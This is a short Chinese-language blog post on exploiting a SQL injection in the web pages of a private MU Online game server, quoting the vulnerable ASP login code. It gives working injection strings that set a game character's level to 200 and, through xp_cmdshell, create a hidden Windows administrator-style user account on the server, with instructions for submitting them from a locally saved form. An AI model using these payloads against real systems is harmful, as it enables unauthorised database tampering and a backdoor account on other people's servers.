入侵奇迹私服网页漏洞
Published: Comment: No Comments
Last Modified:2023-12-13 01:04:35
在.asp中,没有对userchr进行过滤,导致SQL注入.. 不给你文件名!!自己找吧!
<!--#include file="conn.asp" -->
<!--#include file="top.asp" -->
<%
n=request.form("username")
p=request.form("userchr")
if instr(n,"\'")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end
if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID=\'"&n&"\' and Name=\'"&p&"\' and pklevel<>3"
rs1.open sql,conn,1,3
只对username进行了过滤,不够严密饿.:)
下面把clearpk.asp 另存为本地htm文件,然后把action="clearPK.asp"改为action="http:///clearpk.asp,,把表单项里的maxlength去掉..OK..
在角色名称里输入: XX\';update character set clevel=200 where accountID=\'YOUID\';--
在用户名里输入:haha
好了,你的人物已经200级了饿..
如过管理员未对xp_cmdshell存储过程进行限止,那么你还可以把上面的语句换为:
XX\';exec master..xp_cmdshell \'net user hu_ti$ 123 /add\';--
加了一个用户饿..